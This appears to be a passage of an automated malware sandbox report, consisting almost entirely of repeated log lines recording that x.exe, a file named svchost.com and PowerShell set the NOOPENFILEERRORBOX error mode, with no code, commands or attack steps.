                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
